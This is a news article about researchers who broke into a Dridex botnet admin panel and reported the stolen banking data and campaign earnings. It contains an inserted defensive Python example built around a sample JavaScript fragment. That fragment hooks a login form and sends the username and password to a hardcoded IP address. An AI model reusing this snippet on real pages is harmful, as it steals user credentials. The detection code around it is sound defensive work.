Security firm turns the tables and hacks the bad guys

Apr 7, 2016 11:30 GMT

Security researchers from buguroo have managed to find one of Dridex's many admin panels, and after leveraging an older vulnerability, they hacked its backend, retrieved user data and kept an eye on its activity to analyze how the crooks operated.

Their investigation started in January 2016, when their bugFraud Defense endpoint protection system detected a classic Dridex alert, related to Web injections taking place in the user's browser, where Dridex's malware was loading malicious JavaScript on banking websites in order to steal authentication credentials.

Researchers track down and hack one of Dridex's backends

Analyzing the alerts in more depth, researchers found the IP address of one of the Dridex admin panels hardcoded in the malicious JavaScript files used to hijack the user's browser.
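The two paragraphs above describe the detection path: a web inject loads extra JavaScript into a banking page, and that script carries a hardcoded address for the attacker's panel. The following is an added example, not code from buguroo or the article, showing how a defender can triage captured page scripts the same way: extract every URL host the script references, compare it with the bank's own allowlist, and flag raw IP literals as the highest-severity finding. The sample script, the IP 203.0.113.45 (a documentation range) and the hostname online.examplebank.test are all constructed for the example.

```python
import re
import ipaddress

# Constructed sample of script text captured from a browser session on a banking site.
# This is NOT Dridex code: a stand-in for the bank's own script followed by an
# injected fragment that sends login form fields to a hardcoded address.
SAMPLE_SCRIPT = """
var endpoint = "https://online.examplebank.test/api/session";
(function(){var f=document.forms[0];f.onsubmit=function(){
  var x=new XMLHttpRequest();x.open("POST","http://203.0.113.45/gate.php",true);
  x.send(f.user.value+"|"+f.pass.value);};})();
"""

# Hosts the bank's pages are expected to contact (assumed, per-site allowlist).
ALLOWED_HOSTS = {"online.examplebank.test"}

# Host part of any http(s) URL literal: stops at '/', ':', a quote or whitespace.
URL_HOST_RE = re.compile(r"https?://([^/:\"'\s]+)")


def is_ip_literal(host: str) -> bool:
    """True if the host part is a syntactically valid IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_unexpected_hosts(script: str, allowed: set[str] = ALLOWED_HOSTS) -> list[dict]:
    """Return one finding per distinct URL host that is not on the allowlist.

    Raw IP literals are marked 'high' because legitimate banking scripts address
    services by name; unknown hostnames are 'medium' and need a human look.
    """
    findings = []
    seen = set()
    for host in URL_HOST_RE.findall(script):
        host = host.lower()
        if host in allowed or host in seen:
            continue
        seen.add(host)
        findings.append({
            "host": host,
            "severity": "high" if is_ip_literal(host) else "medium",
        })
    return findings


if __name__ == "__main__":
    # Running this prints one line for the injected fragment's hardcoded panel address.
    for finding in find_unexpected_hosts(SAMPLE_SCRIPT):
        print(f"{finding['severity']:6} unexpected host in page script: {finding['host']}")
```

Every host this flags is a candidate indicator to block at the proxy and to hand to the bank's fraud team; the allowlist is the part that has to be maintained per site, since CDNs and analytics hosts will otherwise show up as medium-severity noise.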

Because Dridex operations are carried out on a massive scale, the crooks behind this huge botnet split it into multiple smaller infrastructures, which security researchers call subnets. This fractured architecture makes it harder for security firms to detect Dridex's operations, and also harder to sinkhole the cybergang's infrastructure.

buguroo researchers managed to discover the admin panel of a Dridex section previously known as Subnet 220. As luck would have it, this subnet was running an older version of the Dridex backend, in which some weaknesses had previously been discovered.

This vulnerability allowed researchers to crack open Subnet 220's admin panel and take a look inside. By recovering the data found inside this backend, buguroo researchers were able to determine the scale at which these crooks operate, along with discovering new techniques used in more recent attacks.

Dridex crooks make around $800,000 for every 16,000 stolen credentials

Besides uncovering actual evidence that the crooks are behind the recent Locky ransomware infections, of which there had been numerous other reports, researchers also found victim data that included details such as bank accounts, victim names, last login dates, and card numbers with additional details such as the card's type, bank and country.

Most of the data belonged to banks from English-speaking countries, but victims were from all over the world, mainly from Europe and the Asia-Pacific region.

Statistically, researchers found data from more than 100 countries, belonging to over 900 business entities, of which 70 percent were from English-speaking issuing organizations, and 85 percent of victims were from non-English-speaking countries.

Researchers say that Dridex crooks operate in short-burst campaigns, and launch multiple attacks at various intervals. On average, the crooks collect 16,000 credit card numbers per campaign, and steal around $500 from each victim.

Since banks detect and block these illicit transactions in 90 percent of cases, only about one in ten of the attempted thefts goes through, which means that crooks pocket around $800,000 per campaign.

Photo Gallery (5 Images): How Dridex generally operates; Dridex coders can earn $800,000 per campaign; Dridex Subnet 220 admin panel login page.